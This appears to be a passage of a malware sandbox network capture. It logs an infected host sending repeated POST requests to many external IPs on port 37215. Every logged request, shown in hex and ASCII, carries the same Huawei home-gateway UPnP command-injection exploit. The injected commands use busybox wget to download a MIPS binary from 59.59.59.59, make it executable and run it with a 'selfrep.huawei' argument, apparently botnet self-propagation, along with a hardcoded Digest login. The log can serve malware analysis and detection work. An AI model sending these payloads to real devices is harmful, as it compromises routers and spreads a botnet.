                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          311192.168.2.154614012.68.47.20737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.541795015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          312192.168.2.1547054197.202.96.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542001009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          313192.168.2.1541662197.23.226.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542032003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          314192.168.2.155857041.98.18.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542058945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          315192.168.2.1541592122.238.222.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542259932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          316192.168.2.154081241.7.165.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542360067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          317192.168.2.1547062197.153.136.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542373896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          318192.168.2.1545150157.19.111.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542617083 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          319192.168.2.1537590197.124.210.23037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542618990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          320192.168.2.1540556220.170.89.10137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.542690039 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 